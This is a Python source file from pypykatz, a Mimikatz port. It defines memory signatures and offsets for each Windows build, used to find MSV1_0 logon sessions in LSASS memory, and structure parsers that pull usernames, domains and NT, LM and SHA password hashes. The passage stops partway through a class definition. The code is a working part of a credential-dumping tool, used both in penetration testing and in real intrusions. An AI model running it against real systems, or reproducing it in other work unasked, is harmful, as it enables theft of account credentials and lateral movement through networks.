#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.alsadecryptor.win_datatypes import BOOLEAN, HANDLE, USHORT, ULONG, LSA_UNICODE_STRING, LSAISO_DATA_BLOB, \
	BYTE, PVOID, WORD, DWORD, POINTER, LUID, PSID, ANSI_STRING
from pypykatz.alsadecryptor.package_commons import PackageTemplate

class MsvTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Msv')
		
		self.signature = None
		self.first_entry_offset = None
		self.offset2 = None
		
		self.list_entry = None
		self.encrypted_credentials_list_struct = None
		self.encrypted_credential_struct = None
		self.decrypted_credential_struct = None
	
	@staticmethod
	def get_template(sysinfo):
		template = MsvTemplate()
		template.encrypted_credentials_list_struct = KIWI_MSV1_0_CREDENTIAL_LIST
		template.log_template('encrypted_credentials_list_struct', template.encrypted_credentials_list_struct)
		template.encrypted_credential_struct = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
		template.log_template('encrypted_credential_struct', template.encrypted_credential_struct)
		#identify credential session list structure to be used
		if sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
			template.list_entry = PKIWI_MSV1_0_LIST_51
			
		elif sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
			template.list_entry = PKIWI_MSV1_0_LIST_52
		
		elif sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
			template.list_entry = PKIWI_MSV1_0_LIST_60
		
		elif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
			#do not do that :)
			if sysinfo.msv_dll_timestamp >  0x53480000:
				template.list_entry = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
			else:
				template.list_entry = PKIWI_MSV1_0_LIST_61	
		
		elif sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
			#template.list_entry = PKIWI_MSV1_0_LIST_62
			if sysinfo.msv_dll_timestamp >  0x53480000:
				template.list_entry = PKIWI_MSV1_0_LIST_63
			else:
				template.list_entry = PKIWI_MSV1_0_LIST_62
		
		else:
			template.list_entry = PKIWI_MSV1_0_LIST_63
		
		template.log_template('list_entry', template.list_entry)
		if sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_DEC
		elif sysinfo.buildnumber < WindowsBuild.WIN_10_1511.value:
			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC
		elif sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:
			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_DEC
		else:
			template.decrypted_credential_struct = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC
		
		template.log_template('decrypted_credential_struct', template.decrypted_credential_struct)
			
		if sysinfo.architecture == KatzSystemArchitecture.X64:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
				template.first_entry_offset = -4
				template.offset2 = 0
				
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x4c\x8b\xdf\x49\xc1\xe3\x04\x48\x8b\xcb\x4c\x03\xd8'
				template.first_entry_offset = -4
				template.offset2 = -45
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.signature = b'\x33\xff\x45\x85\xc0\x41\x89\x75\x00\x4c\x8b\xe3\x0f\x84'
				template.first_entry_offset = 21#-4
				template.offset2 = -4
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x33\xf6\x45\x89\x2f\x4c\x8b\xf3\x85\xff\x0f\x84'
				template.first_entry_offset = 19
				template.offset2 = -4	
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
				template.first_entry_offset = 16
				template.offset2 = -4	
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x8b\xde\x48\x8d\x0c\x5b\x48\xc1\xe1\x05\x48\x8d\x05'
				template.first_entry_offset = 36
				template.offset2 = -6	
				
			elif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1703.value:
				#1503 and 1603
				template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
				template.first_entry_offset = 16
				template.offset2 = -4

			elif WindowsBuild.WIN_10_1703.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1803.value:
				#1703
				template.signature = b'\x33\xff\x45\x89\x37\x48\x8b\xf3\x45\x85\xc9\x74'
				template.first_entry_offset = 23
				template.offset2 = -4
			
			elif WindowsBuild.WIN_10_1803.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1903.value:
				#1803
				template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc9\x74'
				template.first_entry_offset = 23
				template.offset2 = -4
				
			else:
				#1903
				template.signature = b'\x33\xff\x41\x89\x37\x4c\x8b\xf3\x45\x85\xc0\x74'
				template.first_entry_offset = 23
				template.offset2 = -4
		
		elif sysinfo.architecture == KatzSystemArchitecture.X86:
			if WindowsMinBuild.WIN_XP.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_2K3.value:
				template.signature = b'\xff\x50\x10\x85\xc0\x0f\x84'
				template.first_entry_offset = 24
				template.offset2 = 0

		
			elif WindowsMinBuild.WIN_2K3.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
				template.first_entry_offset = -11
				template.offset2 = -43

			
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				template.signature = b'\x89\x71\x04\x89\x30\x8d\x04\xbd'
				template.first_entry_offset = -11
				template.offset2 = -42
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				template.signature = b'\x8b\x45\xf8\x8b\x55\x08\x8b\xde\x89\x02\x89\x5d\xf0\x85\xc9\x74'
				template.first_entry_offset = 18
				template.offset2 = -4
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x8b\x4d\xe4\x8b\x45\xf4\x89\x75\xe8\x89\x01\x85\xff\x74'	
				template.first_entry_offset = 16
				template.offset2 = -4
			
			elif sysinfo.buildnumber >= WindowsBuild.WIN_10_1507.value:
				template.signature = b'\x8b\x4d\xe8\x8b\x45\xf4\x89\x75\xec\x89\x01\x85\xff\x74'
				template.first_entry_offset = 16
				template.offset2 = -4
			else:
				raise Exception('Could not identify template! sysinfo.buildnumber: %d' % sysinfo.buildnumber)
		
		else:
			raise Exception('Unknown Architecture: %s , Build number %s' % (sysinfo.architecture, sysinfo.buildnumber))
			
		
		return template
	
	
class MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC:
	#this structure doesnt have username nor domainname, but has credentials :S
	#starts with 
	size = 0x60
	def __init__(self):
		self.unk1 = None
		self.unk2 = None
		self.unk_tag = None
		self.unk_remaining_size = None
		self.LengthOfNtOwfPassword = None
		self.NtOwfPassword = None
		self.LengthOfShaOwfPassword = None
		self.ShaOwPassword = None
		
		self.LogonDomainName = None
		self.UserName = None
		self.LmOwfPassword = None
		self.isNtOwfPassword = None
		self.isLmOwfPassword = None
		self.isShaOwPassword = None

	@staticmethod
	async def load(reader):
		res = MSV1_0_PRIMARY_CREDENTIAL_STRANGE_DEC()
		res.unk1 = await USHORT.loadvalue(reader)
		res.unk2 = await USHORT.loadvalue(reader)
		res.unk_tag = await reader.read(4) #0xcccccc
		res.unk_remaining_size = await ULONG.loadvalue(reader)
		await reader.read(40)
		res.LengthOfNtOwfPassword = await ULONG.loadvalue(reader)
		res.NtOwfPassword = await reader.read(16)
		res.LengthOfShaOwfPassword = await ULONG.loadvalue(reader)
		res.ShaOwPassword = await reader.read(20)
		
		res.LogonDomainName = None
		res.UserName = None
		res.LmOwfPassword = None
		res.isNtOwfPassword = None
		res.isLmOwfPassword = None
		res.isShaOwPassword = None
		return res 
		
class MSV1_0_PRIMARY_CREDENTIAL_DEC:
	def __init__(self):
		self.LogonDomainName = None
		self.UserName = None
		self.NtOwfPassword = None
		self.LmOwfPassword = None
		self.ShaOwPassword = None
		self.isNtOwfPassword = None
		self.isLmOwfPassword = None
		self.isShaOwPassword = None

	@staticmethod
	async def load(reader):
		res = MSV1_0_PRIMARY_CREDENTIAL_DEC()
		res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.NtOwfPassword = await reader.read(16)
		res.LmOwfPassword = await reader.read(16)
		res.ShaOwPassword = await reader.read(20)
		res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
		return res 

class MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC:
	def __init__(self):
		self.LogonDomainName = None
		self.UserName = None
		self.isIso = None
		self.isNtOwfPassword = None
		self.isLmOwfPassword = None
		self.isShaOwPassword = None
		self.align0 = None
		self.align1 = None
		self.NtOwfPassword = None
		self.LmOwfPassword = None
		self.ShaOwPassword = None
	
	@staticmethod
	async def load(reader):
		res = MSV1_0_PRIMARY_CREDENTIAL_10_OLD_DEC()
		res.LogonDomainName = await LSA_UNICODE_STRING.load(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.isIso = await BOOLEAN.loadvalue(reader)
		res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
		res.align0 = await BYTE.loadvalue(reader)
		res.align1 = await BYTE.loadvalue(reader)
		res.NtOwfPassword = await reader.read(16)
		res.LmOwfPassword = await reader.read(16)
		res.ShaOwPassword = await reader.read(20)
		return res 
		
class MSV1_0_PRIMARY_CREDENTIAL_10_DEC:
	def __init__(self):
		self.LogonDomainName =  None
		self.UserName = None
		self.isIso = None
		self.isNtOwfPassword = None
		self.isLmOwfPassword = None
		self.isShaOwPassword = None
		self.align0 = None
		self.align1 = None
		self.align2 = None
		self.align3 = None
		self.NtOwfPassword = None
		self.LmOwfPassword = None
		self.ShaOwPassword = None
	
	@staticmethod
	async def load(reader):
		res = MSV1_0_PRIMARY_CREDENTIAL_10_DEC()
		res.LogonDomainName =  await LSA_UNICODE_STRING.load(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.isIso = await BOOLEAN.loadvalue(reader)
		res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
		res.align0 = await BYTE.loadvalue(reader)
		res.align1 = await BYTE.loadvalue(reader)
		res.align2 = await BYTE.loadvalue(reader)
		res.align3 = await BYTE.loadvalue(reader)
		res.NtOwfPassword = await reader.read(16)
		res.LmOwfPassword = await reader.read(16)
		res.ShaOwPassword = await reader.read(20)
		return res 
		
class MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC:
	def __init__(self):
		self.LogonDomainName = None
		self.UserName = None
		self.pNtlmCredIsoInProc = None
		self.isIso = None
		self.isNtOwfPassword = None
		self.isLmOwfPassword = None
		self.isShaOwPassword = None
		self.isDPAPIProtected = None
		self.align0 = None
		self.align1 = None
		self.align2 = None
		self.unkD = None
		# stuff to be done! #pragma pack(push, 2)
		self.isoSize = None
		self.DPAPIProtected = None
		self.align3 = None
		# stuff to be done! #pragma pack(pop) 
		self.NtOwfPassword = None
		self.LmOwfPassword = None
		self.ShaOwPassword = None
	
	@staticmethod
	async def load(reader):
		res = MSV1_0_PRIMARY_CREDENTIAL_10_1607_DEC()
		res.LogonDomainName =  await LSA_UNICODE_STRING.load(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.pNtlmCredIsoInProc = await PVOID.loadvalue(reader)
		res.isIso = await BOOLEAN.loadvalue(reader)
		res.isNtOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isLmOwfPassword = await BOOLEAN.loadvalue(reader)
		res.isShaOwPassword = await BOOLEAN.loadvalue(reader)
		res.isDPAPIProtected = await BOOLEAN.loadvalue(reader)
		res.align0 = await BYTE.loadvalue(reader)
		res.align1 = await BYTE.loadvalue(reader)
		res.align2 = await BYTE.loadvalue(reader)
		res.unkD = await DWORD.loadvalue(reader) # // 1/2
		# stuff to be done! #pragma pack(push, 2)
		res.isoSize = await WORD.loadvalue(reader) #// 0000
		res.DPAPIProtected = await reader.read(16)
		res.align3 = await DWORD.loadvalue(reader) #// 00000000
		# stuff to be done! #pragma pack(pop) 
		res.NtOwfPassword = await reader.read(16)
		res.LmOwfPassword = await reader.read(16)
		res.ShaOwPassword = await reader.read(20)
		return res 
		
class KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC:
	def __init__(self):
		self.Flink = None
		self.Primary = None
		self.encrypted_credentials = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
		res.Flink = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
		res.Primary = await ANSI_STRING.load(reader)
		await reader.align()
		res.encrypted_credentials = await LSA_UNICODE_STRING.load(reader)
		return res
		
class PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC
		return p

#class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
#	def __init__(self, reader):
#		super().__init__(reader, PKIWI_MSV1_0_CREDENTIAL_LIST)

class KIWI_MSV1_0_CREDENTIAL_LIST:
	def __init__(self):
		self.Flink = None
		self.AuthenticationPackageId = None
		self.PrimaryCredentials_ptr = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_CREDENTIAL_LIST()
		res.Flink = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.AuthenticationPackageId = await DWORD.loadvalue(reader)
		await reader.align()
		res.PrimaryCredentials_ptr = await PKIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC.load(reader)
		return res


class PKIWI_MSV1_0_CREDENTIAL_LIST(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_CREDENTIAL_LIST()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_CREDENTIAL_LIST
		return p
		
class PKIWI_MSV1_0_LIST_51(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_51()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_51
		return p
		
class KIWI_MSV1_0_LIST_51:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.LocallyUniqueIdentifier = None
		self.UserName = None
		self.Domaine = None
		self.unk0 = None
		self.unk1 = None
		self.pSid = None
		self.LogonType = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.CredentialManager = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_51()
		res.Flink = await PKIWI_MSV1_0_LIST_51.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_51.load(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		await reader.align()
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await ULONG.loadvalue(reader)
		await reader.align()
		res.CredentialManager = await PVOID.load(reader)
		return res

class PKIWI_MSV1_0_LIST_52(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_52()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_52
		return p
		
class KIWI_MSV1_0_LIST_52:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.LocallyUniqueIdentifier = None
		self.UserName = None
		self.Domaine = None
		self.unk0 = None
		self.unk1 = None
		self.pSid = None
		self.LogonType = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.CredentialManager = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_52()
		res.Flink = await PKIWI_MSV1_0_LIST_52.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_52.load(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await PVOID.loadvalue(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await ULONG.loadvalue(reader)
		await reader.align()
		res.CredentialManager = await PVOID.load(reader)
		return res

class PKIWI_MSV1_0_LIST_60(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_60()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_60
		return p

class KIWI_MSV1_0_LIST_60:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.hSemaphore6 = None
		self.unk7 = None
		self.hSemaphore8 = None
		self.unk9 = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.LocallyUniqueIdentifier = None
		self.SecondaryLocallyUniqueIdentifier = None
		self.UserName = None
		self.Domaine = None
		self.unk14 = None
		self.unk15 = None
		self.pSid = None
		self.LogonType = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.CredentialManager = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_60()
		res.Flink = await PKIWI_MSV1_0_LIST_60.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_60.load(reader)
		await reader.align()
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		res.unk5 = await ULONG.loadvalue(reader)
		await reader.align()
		res.hSemaphore6 = await HANDLE.loadvalue(reader)
		await reader.align()
		res.unk7 = await PVOID.loadvalue(reader)
		await reader.align()
		res.hSemaphore8 = await HANDLE.loadvalue(reader)
		await reader.align()
		res.unk9 = await PVOID.loadvalue(reader)
		await reader.align()
		res.unk10 = await PVOID.loadvalue(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk13 = await PVOID.loadvalue(reader)
		await reader.align()
		t = await reader.read(8)
		res.LocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
		t = await reader.read(8)
		res.SecondaryLocallyUniqueIdentifier = int.from_bytes(t, byteorder = 'little', signed = False)
		await reader.align()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.unk15 = await PVOID.loadvalue(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await PVOID.loadvalue(reader)
		res.unk23 = await ULONG.loadvalue(reader)
		await reader.align()
		res.CredentialManager = await PVOID.load(reader)
		return res

class PKIWI_MSV1_0_LIST_61(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_61()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_61
		return p
		
class KIWI_MSV1_0_LIST_61:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.hSemaphore6 = None
		self.unk7 = None
		self.hSemaphore8 = None
		self.unk9 = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.LocallyUniqueIdentifier = None
		self.SecondaryLocallyUniqueIdentifier = None
		self.UserName = None
		self.Domaine = None
		self.unk14 = None
		self.unk15 = None
		self.pSid = None
		self.LogonType = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.CredentialManager = None


	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_61()
		res.Flink = await PKIWI_MSV1_0_LIST_61.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_61.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		res.unk5 = await ULONG.loadvalue(reader)
		await reader.align()
		res.hSemaphore6 = await HANDLE.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.hSemaphore8 = await HANDLE.loadvalue(reader)
		res.unk9 = await PVOID.loadvalue(reader)
		res.unk10 = await PVOID.loadvalue(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.unk15 = await PVOID.loadvalue(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await ULONG.loadvalue(reader)
		await reader.align()
		res.CredentialManager = await PVOID.load(reader)
		return res

class PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ
		return p
		
class KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.hSemaphore6 = None
		self.unk7 = None
		self.hSemaphore8 = None
		self.unk9 = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.LocallyUniqueIdentifier = None
		self.SecondaryLocallyUniqueIdentifier = None
		self.waza = None
		self.UserName = None
		self.Domaine = None
		self.unk14 = None
		self.unk15 = None
		self.pSid = None
		self.LogonType = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.CredentialManager = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ()
		res.Flink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		res.unk5 = await ULONG.loadvalue(reader)
		await reader.align()
		res.hSemaphore6 = await HANDLE.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.hSemaphore8 = await HANDLE.loadvalue(reader)
		res.unk9 = await PVOID.loadvalue(reader)
		res.unk10 = await PVOID.loadvalue(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.waza = await reader.read(12)
		await reader.align()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.unk15 = await PVOID.loadvalue(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await ULONG.loadvalue(reader)
		await reader.align()
		res.CredentialManager = await PVOID.load(reader)
		return res

class PKIWI_MSV1_0_LIST_62(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_62()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_62
		return p
		
class KIWI_MSV1_0_LIST_62:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.hSemaphore6 = None
		self.unk7 = None
		self.hSemaphore8 = None
		self.unk9 = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.LocallyUniqueIdentifier = None
		self.SecondaryLocallyUniqueIdentifier = None
		self.UserName = None
		self.Domaine = None
		self.unk14 = None
		self.unk15 = None
		self.Type = None
		self.pSid = None
		self.LogonType = None
		self.unk18 = None
		self.Session = None
		self.LogonTime = None
		self.LogonServer = None
